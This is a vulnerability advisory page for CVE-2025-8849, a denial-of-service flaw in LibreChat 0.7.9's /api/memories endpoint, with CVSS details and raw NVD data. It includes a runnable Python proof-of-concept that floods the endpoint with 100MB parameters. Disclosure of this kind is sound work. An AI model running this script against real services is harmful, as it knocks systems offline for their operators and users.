Security Vulnerability Report
中文
CVE-2025-8849 CVSS 7.5 HIGH

CVE-2025-8849

Published: 2025-10-31 00:15:37
Last Modified: 2025-11-10 17:14:44
Source: [email protected]

Description

LibreChat version 0.7.9 is vulnerable to a Denial of Service (DoS) attack due to unbounded parameter values in the `/api/memories` endpoint. The `key` and `value` parameters accept arbitrarily large inputs without proper validation, leading to a null pointer error in the Rust-based backend when excessively large values are submitted. This results in the inability to create new memories, impacting the stability of the service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:librechat:librechat:0.7.9:-:*:*:*:*:*:* - VULNERABLE
LibreChat < 0.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys import time # CVE-2025-8849 PoC - LibreChat DoS via unbounded parameter values # Target: /api/memories endpoint def exploit_cve_2025_8849(target_url): """ Exploit for CVE-2025-8849: LibreChat DoS via oversized parameters This PoC demonstrates sending oversized key/value parameters to the /api/memories endpoint to trigger a null pointer error. """ # Generate oversized parameter values (100MB+) oversized_key = "A" * (100 * 1024 * 1024) # 100MB key oversized_value = "B" * (100 * 1024 * 1024) # 100MB value endpoint = f"{target_url.rstrip('/')}/api/memories" headers = { "Content-Type": "application/json" } payload = { "key": oversized_key, "value": oversized_value } print(f"[*] Targeting: {endpoint}") print(f"[*] Sending oversized parameters (100MB+ each)...") try: response = requests.post(endpoint, json=payload, headers=headers, timeout=60) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code >= 500: print("[+] DoS condition likely triggered!") return True else: print("[-] Request completed but DoS not confirmed") return False except requests.exceptions.RequestException as e: print(f"[+] Request failed (possibly due to DoS): {e}") return True def verify_vulnerability(target_url): """ Verify the vulnerability exists by checking version and endpoint availability """ endpoint = f"{target_url.rstrip('/')}/api/memories" # Test with moderately large values first test_payload = { "key": "X" * (10 * 1024 * 1024), # 10MB "value": "Y" * (10 * 1024 * 1024) # 10MB } print(f"[*] Verifying vulnerability at {endpoint}") print(f"[*] Testing with 10MB parameters...") try: response = requests.post(endpoint, json=test_payload, timeout=30) print(f"[*] Status: {response.status_code}") # Check if the endpoint accepts the request if response.status_code in [200, 201, 400, 413, 500]: print("[+] Endpoint is reachable and accepts large parameters") print("[+] Vulnerability likely present") return True except Exception as e: print(f"[+] Error occurred: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_8849_poc.py <target_url>") print("Example: python cve_2025_8849_poc.py http://localhost:3080") sys.exit(1) target = sys.argv[1] print("=" * 60) print("CVE-2025-8849 PoC - LibreChat /api/memories DoS") print("=" * 60) if verify_vulnerability(target): print("\n[*] Attempting full exploit...") exploit_cve_2025_8849(target) else: print("[-] Vulnerability verification failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8849", "sourceIdentifier": "[email protected]", "published": "2025-10-31T00:15:37.480", "lastModified": "2025-11-10T17:14:43.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat version 0.7.9 is vulnerable to a Denial of Service (DoS) attack due to unbounded parameter values in the `/api/memories` endpoint. The `key` and `value` parameters accept arbitrarily large inputs without proper validation, leading to a null pointer error in the Rust-based backend when excessively large values are submitted. This results in the inability to create new memories, impacting the stability of the service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.7.9:-:*:*:*:*:*:*", "matchCriteriaId": "74A99A2E-023B-4C39-9696-61DA01C9284E"}]}]}], "references": [{"url": "https://github.com/danny-avila/librechat/commit/edf33bedcbb08c33e59df76f06454ed7efd896f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/e9d9404c-cd19-4226-a580-9cba14b7d7d6", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.